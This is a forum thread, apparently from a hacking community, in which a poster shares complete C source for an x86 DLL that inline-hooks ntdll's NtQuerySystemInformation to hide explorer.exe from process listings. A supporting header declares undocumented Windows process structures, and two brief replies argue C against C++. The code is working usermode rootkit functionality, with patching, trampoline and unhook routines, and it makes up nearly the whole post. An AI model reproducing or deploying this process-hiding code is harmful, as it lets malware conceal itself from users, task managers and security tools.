

Thread: [c] Process Hiding



    [c] Process Hiding

    I didn't really see a good C example, so I decided to share my DLL that hooks NtQuerySystemInformation and hides explorer.exe. Note that this is a user-mode, per-process inline hook: it only affects process listings requested by the process the DLL is loaded into, and because the trampoline is written in 32-bit inline assembly it is x86-only.

    Code:
    #include <Windows.h>
    #include "sysinfo.h"
    
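    /* The 5 bytes of ntdll!NtQuerySystemInformation that PlaceHook()
     * overwrites with its jmp.  They are copied into the trampoline so the
     * original function can still be reached, and written back by UnHook().
     * All zero until PlaceHook() has run successfully.  File-scope only:
     * nothing outside this translation unit needs either symbol. */
    static BYTE OrigBytes[5];
    /* Image name, as reported in SYSTEM_PROCESSES.ProcessName, to hide. */
    static const WCHAR g_TargetProc[] = L"explorer.exe";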
    
    /*
     * Trampoline into the real NtQuerySystemInformation.
     *
     * Declared naked so the compiler emits no prologue/epilogue: the body is
     * a fixed byte pattern that PlaceHook() rewrites at run time, so the
     * exact encoding of each instruction matters:
     *
     *   offset 0..4   mov eax, 0dfh        5-byte placeholder; replaced with
     *                                      the 5 original bytes saved in OrigBytes
     *   offset 5      B9                   opcode of `mov ecx, imm32`
     *   offset 6..9   0xcafebabe           placeholder; replaced with the
     *                                      address of (hooked function + 5)
     *   offset 10..11 jmp ecx              continue in the original function
     *
     * The parameters are never read here; they stay on the stack for the
     * real function (NTAPI/stdcall calling convention, x86).
     *
     * NOTE(review): x86/MSVC only (32-bit __asm).  It clobbers ecx, which is
     * harmless for an stdcall target whose arguments are on the stack, but
     * not for an arbitrary one.  It also assumes the target's first 5 bytes
     * are whole, position-independent instructions; a relative jump or call
     * in those bytes would be executed from the wrong address — confirm for
     * the ntdll build you run against.
     */
    __declspec(naked) NTSTATUS NTAPI  OriginalNtQuerySystemInformation(
    		IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
    		IN OUT PVOID SystemInformation,
    		IN ULONG SystemInformationLength,
    		OUT PULONG ReturnLength OPTIONAL
    	)
    {
        __asm
        {
    		mov eax, 0dfh // 5-byte placeholder, overwritten with the 5 saved original bytes
            mov ecx, 0xcafebabe // imm32 at offset 6 is patched to (original + 5)
            jmp ecx             // resume the original function past the patched bytes
        }
    }
    
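    /*
     * Case-insensitive equality of a counted wide string against a
     * NUL-terminated one.  Only ASCII letters are folded, which is enough
     * for the image names this file targets.  Deliberately avoids the CRT
     * and user32 so it can run inside the hook at any point in the
     * process's lifetime.
     */
    static BOOL NameEqualsIgnoreCase(const WCHAR *counted, SIZE_T countedChars,
                                     const WCHAR *terminated)
    {
    	SIZE_T i;

    	for (i = 0; i < countedChars; i++) {
    		WCHAR a = counted[i];
    		WCHAR b = terminated[i];

    		if (b == L'\0')
    			return FALSE;              /* terminated string is shorter */
    		if (a >= L'A' && a <= L'Z')
    			a = (WCHAR)(a - L'A' + L'a');
    		if (b >= L'A' && b <= L'Z')
    			b = (WCHAR)(b - L'A' + L'a');
    		if (a != b)
    			return FALSE;
    	}
    	return terminated[countedChars] == L'\0';   /* same length too */
    }

    /*
     * Unlinks every record after the head whose ProcessName equals
     * g_TargetProc from a SystemProcessInformation list.
     *
     * Records are chained by NextEntryDelta (byte offset to the next record,
     * 0 on the last one); a record is hidden by making its predecessor's
     * delta skip over it, or by making the predecessor the last record when
     * the hidden one was last.  The head (PID 0, Idle) is never a candidate.
     * bufferLength bounds every read so a truncated or malformed buffer
     * stops the walk instead of reading past the caller's allocation.
     */
    static void HideTargetProcesses(PSYSTEM_PROCESSES head, ULONG bufferLength)
    {
    	PBYTE end = (PBYTE)head + bufferLength;
    	PSYSTEM_PROCESSES prev = head;

    	/* The head must be readable up to and including ProcessName. */
    	if ((PBYTE)head + FIELD_OFFSET(SYSTEM_PROCESSES, BasePriority) > end)
    		return;

    	while (prev->NextEntryDelta != 0) {
    		PSYSTEM_PROCESSES cur = (PSYSTEM_PROCESSES)((PBYTE)prev + prev->NextEntryDelta);
    		const UNICODE_STRING *name;

    		if ((PBYTE)cur + FIELD_OFFSET(SYSTEM_PROCESSES, BasePriority) > end)
    			break;                     /* would read outside the buffer */

    		/* Length is a byte count; Buffer need not be NUL-terminated. */
    		name = &cur->ProcessName;
    		if (name->Buffer != NULL &&
    		    NameEqualsIgnoreCase(name->Buffer, name->Length / sizeof(WCHAR), g_TargetProc)) {
    			prev->NextEntryDelta = (cur->NextEntryDelta == 0)
    			                     ? 0
    			                     : prev->NextEntryDelta + cur->NextEntryDelta;
    			/* prev is deliberately NOT advanced: the record after cur is
    			 * examined next, so a run of consecutive matches is fully
    			 * removed and prev always stays a visible record. */
    		} else {
    			prev = cur;
    		}
    	}
    }

    /*
     * Replacement for NtQuerySystemInformation.
     *
     * Forwards every call to the real function through the trampoline and,
     * for SystemProcessInformation, removes every g_TargetProc record from
     * the list the kernel returned.  Other classes pass through unchanged;
     * ReturnLength is left as the kernel set it.
     *
     * Fixes relative to the original version:
     *  - the buffer is only walked when the call succeeded and a buffer is
     *    present (the caller's usual sizing probe fails with
     *    STATUS_INFO_LENGTH_MISMATCH and leaves nothing parseable);
     *  - the last record can now be hidden (the old loop stopped one short);
     *  - consecutive matches are all hidden (the old loop advanced the
     *    predecessor onto the record it had just unlinked);
     *  - names are compared by their counted Length, case-insensitively,
     *    instead of via lstrcmpW on a possibly unterminated Buffer;
     *  - every read is bounded by SystemInformationLength.
     *
     * NOTE(review): other information classes also return process records
     * (e.g. SystemExtendedProcessInformation, 57, which sysinfo.h does not
     * enumerate); a tool using one of those still sees the process.  Confirm
     * whether that matters for your use before relying on this.
     */
    NTSTATUS NTAPI HookedNtQuerySystemInformation(
    		IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
    		IN OUT PVOID SystemInformation,
    		IN ULONG SystemInformationLength,
    		OUT PULONG ReturnLength OPTIONAL
    	)
    {
    	NTSTATUS Result = OriginalNtQuerySystemInformation(SystemInformationClass,
    	                                                  SystemInformation,
    	                                                  SystemInformationLength,
    	                                                  ReturnLength);

    	/* Nothing to filter unless the kernel actually filled the buffer. */
    	if (!NT_SUCCESS(Result) || SystemInformation == NULL)
    		return Result;

    	switch (SystemInformationClass)
    	{
    	case SystemProcessInformation:
    		HideTargetProcesses((PSYSTEM_PROCESSES)SystemInformation,
    		                    SystemInformationLength);
    		break;
    	default:
    		break;
    	}

    	return Result;
    }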
    
    
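    /*
     * Installs the inline hook on ntdll!NtQuerySystemInformation.
     *
     * Patch layout (x86 only — the trampoline is 32-bit inline asm):
     *   target[0..4]  <- E9 rel32          jmp HookedNtQuerySystemInformation
     *   stub[0..4]    <- original 5 bytes  (saved first in OrigBytes for UnHook)
     *   stub[6..9]    <- abs32             address of target+5, loaded by the
     *                                      trampoline's `mov ecx, imm32`
     *
     * Returns 0 on success, 1 on failure (ntdll or the export not found, or
     * a region could not be made writable).  On failure ntdll is left
     * unpatched; at most the private trampoline has been written.
     *
     * Fixes relative to the original version: OrigBytes was copied from the
     * export before the NULL check on it; VirtualProtect results were
     * ignored; the trampoline was unprotected for 9 bytes although the imm32
     * lives at offsets 6..9 (it only worked because protection is
     * page-granular); the rel32/abs32 were written as pointer-sized stores
     * where the encoding is 32-bit; and the instruction cache was never
     * flushed after rewriting code.
     *
     * NOTE(review): assumes the target's first 5 bytes are whole,
     * position-independent instructions and that no other thread is
     * executing them while they are rewritten (this runs from DllMain at
     * load time) — confirm for your injection point and ntdll build.
     */
    DWORD PlaceHook()
    {
    	enum {
    		PATCH_SIZE       = 5,   /* size of the E9 rel32 jmp written to ntdll */
    		STUB_ADDR_OFFSET = 6,   /* imm32 of `mov ecx` inside the trampoline */
    		STUB_PATCH_SIZE  = 10   /* trampoline bytes rewritten: offsets 0..9 */
    	};
    	DWORD oldProtect;
    	LPBYTE sourceFunction;
    	LPBYTE destFunction = (LPBYTE)HookedNtQuerySystemInformation;
    	LPBYTE stubFunction = (LPBYTE)OriginalNtQuerySystemInformation;
    	HMODULE ntdll = GetModuleHandleA("ntdll.dll");

    	if (ntdll == NULL)
    		return 1;
    	sourceFunction = (LPBYTE)GetProcAddress(ntdll, "NtQuerySystemInformation");
    	if (sourceFunction == NULL)
    		return 1;

    	/* Save the bytes we are about to overwrite; UnHook() restores them. */
    	CopyMemory(OrigBytes, sourceFunction, PATCH_SIZE);

    	/* Patch the trampoline: original prologue, then the resume address. */
    	if (!VirtualProtect(stubFunction, STUB_PATCH_SIZE, PAGE_EXECUTE_READWRITE, &oldProtect))
    		return 1;
    	CopyMemory(stubFunction, OrigBytes, PATCH_SIZE);
    	*(DWORD *)(stubFunction + STUB_ADDR_OFFSET) = (DWORD)(ULONG_PTR)(sourceFunction + PATCH_SIZE);
    	VirtualProtect(stubFunction, STUB_PATCH_SIZE, oldProtect, &oldProtect);
    	FlushInstructionCache(GetCurrentProcess(), stubFunction, STUB_PATCH_SIZE);

    	/* Patch the target: 5-byte relative jmp to the hook. */
    	if (!VirtualProtect(sourceFunction, PATCH_SIZE, PAGE_EXECUTE_READWRITE, &oldProtect))
    		return 1;
    	sourceFunction[0] = 0xE9;
    	*(DWORD *)(sourceFunction + 1) = (DWORD)(destFunction - (sourceFunction + PATCH_SIZE));
    	VirtualProtect(sourceFunction, PATCH_SIZE, oldProtect, &oldProtect);
    	FlushInstructionCache(GetCurrentProcess(), sourceFunction, PATCH_SIZE);

    	return 0;
    }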
    
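    /*
     * Removes the hook by writing the 5 bytes saved in OrigBytes back over
     * ntdll!NtQuerySystemInformation.
     *
     * Acts only when our patch is actually present: the export must start
     * with an E9 jmp whose rel32 lands on HookedNtQuerySystemInformation.
     * Without that check a detach after a failed PlaceHook() (OrigBytes
     * still all zero) or after another component re-hooked the export would
     * write five stale bytes into ntdll.  Also tolerates the export being
     * unavailable, checks VirtualProtect, and flushes the instruction cache
     * after the write — all omitted by the original.
     */
    void UnHook()
    {
    	enum { PATCH_SIZE = 5 };          /* size of the jmp PlaceHook() wrote */
    	DWORD oldProtect;
    	HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    	LPBYTE addr;
    	LPBYTE jmpTarget;

    	if (ntdll == NULL)
    		return;
    	addr = (LPBYTE)GetProcAddress(ntdll, "NtQuerySystemInformation");
    	if (addr == NULL)
    		return;

    	/* Decode the jmp currently at the export and make sure it is ours. */
    	jmpTarget = addr + PATCH_SIZE + *(LONG *)(addr + 1);
    	if (addr[0] != 0xE9 || jmpTarget != (LPBYTE)HookedNtQuerySystemInformation)
    		return;

    	if (!VirtualProtect(addr, PATCH_SIZE, PAGE_EXECUTE_READWRITE, &oldProtect))
    		return;
    	CopyMemory(addr, OrigBytes, PATCH_SIZE);
    	VirtualProtect(addr, PATCH_SIZE, oldProtect, &oldProtect);
    	FlushInstructionCache(GetCurrentProcess(), addr, PATCH_SIZE);
    }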
     
    
    
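    /*
     * DLL entry point: hooks on process attach, unhooks on process detach.
     *
     * The original ignored PlaceHook()'s result, so a failed hook still
     * reported success to the loader and UnHook() would later run with an
     * unfilled OrigBytes.  Now a failed hook makes DllMain return FALSE
     * (per the DllMain documentation the loader then fails LoadLibrary, or
     * terminates the process if we were a static import), and the detach
     * path only unhooks if the attach actually hooked.  Thread attach/detach
     * notifications are ignored.  The first parameter keeps the original
     * HANDLE type; the documented signature uses HINSTANCE, which is
     * layout-compatible.
     */
    BOOL WINAPI DllMain(HANDLE hinstDLL, DWORD dwReason, LPVOID lpvReserved){
    	static BOOL s_hooked = FALSE;     /* set only when PlaceHook() succeeded */

    	(void)hinstDLL;
    	(void)lpvReserved;

    	switch (dwReason){
    	case DLL_PROCESS_ATTACH:
    		s_hooked = (PlaceHook() == 0);
    		if (!s_hooked)
    			return FALSE;             /* tell the loader initialization failed */
    		break;
    	case DLL_PROCESS_DETACH:
    		if (s_hooked) {
    			UnHook();
    			s_hooked = FALSE;
    		}
    		break;
    	default:
    		break;
    	}

    	return TRUE;
    }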
    And the header file, sysinfo.h, that the DLL includes:
    Code:
    #ifndef __SYSINFO_H__
    #define __SYSINFO_H__
    
    /* Provide a plain LONG definition of NTSTATUS in case the SDK headers in
     * use do not define it (the guard is on the macro name, so an SDK that
     * defines it as a typedef rather than a macro would still be shadowed). */
    #ifndef NTSTATUS
    #define NTSTATUS LONG
    #endif

    /* An NTSTATUS with the sign bit clear is a success or informational code. */
    #define NT_SUCCESS(x) ((x) >= 0)
    #define STATUS_SUCCESS	0x00000000
    
    /*
     * Information classes accepted by NtQuerySystemInformation.  Values are
     * implicit and sequential (0..44).  Only SystemProcessInformation (5) is
     * used by this file; the remaining names are kept for completeness.
     *
     * NOTE(review): this list ends at 44.  Newer classes that also return
     * process records (e.g. SystemExtendedProcessInformation, 57, in public
     * phnt-style headers) are not enumerated here — confirm whether the
     * hook needs to cover them.
     */
    typedef enum _SYSTEM_INFORMATION_CLASS {

    SystemBasicInformation, 
    SystemProcessorInformation, 
    SystemPerformanceInformation, 
    SystemTimeOfDayInformation, 
    SystemPathInformation, 
    SystemProcessInformation,           /* 5: list of SYSTEM_PROCESSES records */
    SystemCallCountInformation, 
    SystemDeviceInformation, 
    SystemProcessorPerformanceInformation, 
    SystemFlagsInformation, 
    SystemCallTimeInformation, 
    SystemModuleInformation, 
    SystemLocksInformation, 
    SystemStackTraceInformation, 
    SystemPagedPoolInformation, 
    SystemNonPagedPoolInformation, 
    SystemHandleInformation, 
    SystemObjectInformation, 
    SystemPageFileInformation, 
    SystemVdmInstemulInformation, 
    SystemVdmBopInformation, 
    SystemFileCacheInformation, 
    SystemPoolTagInformation, 
    SystemInterruptInformation, 
    SystemDpcBehaviorInformation, 
    SystemFullMemoryInformation, 
    SystemLoadGdiDriverInformation, 
    SystemUnloadGdiDriverInformation, 
    SystemTimeAdjustmentInformation, 
    SystemSummaryMemoryInformation, 
    SystemNextEventIdInformation, 
    SystemEventIdsInformation, 
    SystemCrashDumpInformation, 
    SystemExceptionInformation, 
    SystemCrashDumpStateInformation, 
    SystemKernelDebuggerInformation, 
    SystemContextSwitchInformation, 
    SystemRegistryQuotaInformation, 
    SystemExtendServiceTableInformation, 
    SystemPrioritySeperation,           /* sic: spelling kept for source compatibility */
    SystemPlugPlayBusInformation, 
    SystemDockInformation, 
    SystemPowerInformation1, 
    SystemProcessorSpeedInformation, 
    SystemCurrentTimeZoneInformation, 
    SystemLookasideInformation
    
    } SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS;
    
    /* Counted wide string in the Windows UNICODE_STRING layout.  Length and
     * MaximumLength are byte counts, not character counts, and Buffer is
     * not guaranteed to be NUL-terminated — consumers should compare using
     * Length / sizeof(WCHAR) rather than scanning for a terminator. */
    typedef struct _LSA_UNICODE_STRING {
    	USHORT Length;          /* bytes in use */
    	USHORT MaximumLength;   /* bytes allocated */
    	PWSTR  Buffer;
    }LSA_UNICODE_STRING, *PLSA_UNICODE_STRING, UNICODE_STRING, *PUNICODE_STRING;
    
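    /* Pointer to a read-only UNICODE_STRING.  The original spelled this
     * `CONST PUNICODE_STRING`, which makes the pointer itself immutable but
     * leaves the string writable; the SDK meaning is `const UNICODE_STRING *`.
     * Not referenced by this listing. */
    typedef CONST UNICODE_STRING *PCUNICODE_STRING;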
    
    /* Scheduler priority value as used in SYSTEM_THREADS / SYSTEM_PROCESSES. */
    typedef LONG KPRIORITY;
    
    /* Per-process virtual-memory counters embedded in SYSTEM_PROCESSES.
     * Not inspected by this file; present only so the record layout (and
     * therefore the offsets of the fields that are read) is correct. */
    typedef struct _VM_COUNTERS {
    SIZE_T PeakVirtualSize;
    SIZE_T VirtualSize;
    ULONG PageFaultCount;
    SIZE_T PeakWorkingSetSize;
    SIZE_T WorkingSetSize;
    SIZE_T QuotaPeakPagedPoolUsage;
    SIZE_T QuotaPagedPoolUsage;
    SIZE_T QuotaPeakNonPagedPoolUsage;
    SIZE_T QuotaNonPagedPoolUsage;
    SIZE_T PagefileUsage;
    SIZE_T PeakPagefileUsage;
    } VM_COUNTERS;
    
    /* Process/thread id pair embedded in SYSTEM_THREADS.
     * NOTE(review): the SDK declares both members as HANDLE (pointer-sized);
     * DWORD matches only on 32-bit, which is the only target this file's
     * inline asm supports anyway — revisit before any x64 port. */
    typedef struct _CLIENT_ID {
    DWORD UniqueProcess;
    DWORD UniqueThread;
    } CLIENT_ID;
    
    /* One per-thread record; ThreadCount of these follow each
     * SYSTEM_PROCESSES record (see its trailing Threads[1] member).
     * Not inspected by this file. */
    typedef struct _SYSTEM_THREADS {
    LARGE_INTEGER KernelTime;
    LARGE_INTEGER UserTime;
    LARGE_INTEGER CreateTime;
    ULONG WaitTime;
    PVOID StartAddress;
    CLIENT_ID ClientId;
    KPRIORITY Priority;
    KPRIORITY BasePriority;
    ULONG ContextSwitchCount;
    LONG State;
    LONG WaitReason;
    } SYSTEM_THREADS, * PSYSTEM_THREADS;
    
    /*
     * One process record as returned for SystemProcessInformation (the
     * NT4/2000-era name for what the current SDK calls
     * SYSTEM_PROCESS_INFORMATION).  Records are laid out back to back in
     * the output buffer and linked by NextEntryDelta; the hook in this file
     * walks that chain and only reads NextEntryDelta and ProcessName.
     *
     * NOTE(review): this is the 32-bit layout (ULONG ids, 6-ULONG reserved
     * block).  Field widths differ on x64 — confirm before any port.
     */
    typedef struct _SYSTEM_PROCESSES { 
    		ULONG NextEntryDelta;          /* byte offset to the next record; 0 on the last */
    		ULONG ThreadCount;             /* number of SYSTEM_THREADS entries in Threads[] */
    		ULONG Reserved1[6];
    		LARGE_INTEGER CreateTime;
    		LARGE_INTEGER UserTime;
    		LARGE_INTEGER KernelTime;
    		UNICODE_STRING ProcessName;    /* image name; Buffer is NULL for the Idle process */
    		KPRIORITY BasePriority;
    		ULONG ProcessId;
    		ULONG InheritedFromProcessId;
    		ULONG HandleCount;
    		ULONG Reserved2[2];
    		VM_COUNTERS VmCounters;
    		IO_COUNTERS IoCounters;  
    		SYSTEM_THREADS Threads[1];     /* variable length: ThreadCount entries */
    	} SYSTEM_PROCESSES, *PSYSTEM_PROCESSES;
    
    
    
    /* Function-pointer type matching ntdll!NtQuerySystemInformation.
     * Not used by the hook (it reaches the original through a patched
     * naked trampoline instead); kept for callers that prefer
     * GetProcAddress.  The leading double underscore is a reserved
     * identifier form — rename if this header is reused. */
    typedef NTSTATUS (NTAPI *__NtQuerySystemInformation)(
    		IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
    		IN OUT PVOID SystemInformation,
    		IN ULONG SystemInformationLength,
    		OUT PULONG ReturnLength OPTIONAL
    	);
    
    #endif
    lawl, C > C++ any day. any goddamn day.
    lawl, C > C++ any day. any goddamn day.
    >:| C++ without using retarded shit (stl, boost) is just as good as C :/
